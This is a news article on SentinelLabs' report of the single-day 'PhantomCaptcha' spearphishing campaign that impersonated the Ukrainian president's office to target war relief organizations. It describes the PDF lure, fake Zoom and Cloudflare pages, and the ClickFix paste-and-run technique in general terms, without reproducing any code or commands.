'PhantomCaptcha' hackers impersonate Ukrainian president’s office in attack on war relief workers

Cybersecurity researchers have uncovered a mysterious spearphishing campaign impersonating the Ukrainian president’s office that disappeared on the same day it was launched in a bid to compromise organizations involved in war relief efforts.

According to a report published Wednesday by cybersecurity company SentinelLabs, the single-day campaign on October 8 targeted individual members of the International Committee of the Red Cross, the Norwegian Refugee Council and the U.N. Children’s Fund (UNICEF) alongside other NGOs involved in war relief efforts.

Although it remains unclear who was behind the campaign, tracked as “PhantomCaptcha,” the target list suggests the perpetrator was “seeking intelligence across humanitarian operations, reconstruction planning, and international coordination efforts” related to support for Ukraine, SentinelLabs said.

The hackers also targeted Ukrainian government administrations in the Donetsk, Dnipropetrovsk, Poltava and Mikolaevsk regions when they sent emails containing weaponized PDFs pretending to be official communications from the Office of the President of Ukraine.

Tom Hegel, the research lead at SentinelOne, wrote that despite six months of preparation — going by the initial infrastructure registration to the day of attack execution — the spearphishing campaign was only active for a single day before that infrastructure was taken offline, “indicating sophisticated planning and strong commitment to operational security.”

The hackers behind the campaign sent targets a convincing eight-page document that was intended to start their victims along a sophisticated multistage attack chain exploiting their trust and bypassing traditional security controls.

If a victim clicked on the embedded link in the PDF, they could be redirected to a domain masquerading as a legitimate website for the teleconference app Zoom that was in reality a server owned by Russian provider KVMKA.

A Zoom call, or perhaps worse

Although the server stopped resolving on the same day the attempted attack took place, SentinelLabs was able to retrieve the server response from the VirusTotal repository. It was a fake, but convincing, Cloudflare DDoS protection gateway.

This allowed for two different potential methods for compromising the victims’ devices. They could either be redirected to a real password-protected Zoom meeting, which Hegel wrote could have enabled live social engineering calls with victims, or they would have been potentially tricked into  accidentally executing commands copied to their clipboard. Researchers call the latter a “ClickFix” or “Paste and Run” technique.

The PhantomCaptcha variant of this attack, as described by SentinelLabs, tricks Windows users to copy a “token” from the fake Cloudflare DDoS protection gateway and then press Windows + R before pasting the “token” and executing the command — which is actually a PowerShell script designed to compromise their computer.

“This social engineering technique is particularly effective because the malicious code is executed by the user themselves, evading endpoint security controls that focus solely on detecting malicious files,” the researchers said..

Although the public-facing lure domain was quickly yoinked by the attackers, SentinelLabs found backend command and control infrastructure that remained active even after the initial attack day, “indicating strong compartmentalization and the need to maintain certain infrastructure for already-compromised systems.”

The researchers found that the day afterward, October 9, a domain with a similar URL to the public-facing lure had been registered, “potentially indicating plans for continued operations.”

Their infrastructure analysis also turned up a link to a wider campaign “making use of adult-oriented social and entertainment lures, with potential links to Russia/Belarus source development,” although this campaign is being tracked as a separate cluster of activity.

Specifically, this campaign seemed to be themed around what the report described as “an adult entertainment venue in Lviv, Ukraine, called Princess Men’s Club,” including both a website and an APK designed to harvest a range of personal and device information from compromised victims.

The timeline of the PhantomCaptcha campaign suggested the perpetrator had “an understanding of both offensive operations and defensive detection capabilities,” added SentinelLabs, although the company said it was unable to attribute the cluster of activity to a known actor at the time it published the report.

The sophistication of the campaign was “indicative of an adversary capable of a high level of operational planning, evidenced in extended preparation, compartmentalized infrastructure, and deliberate exposure control,” the company said.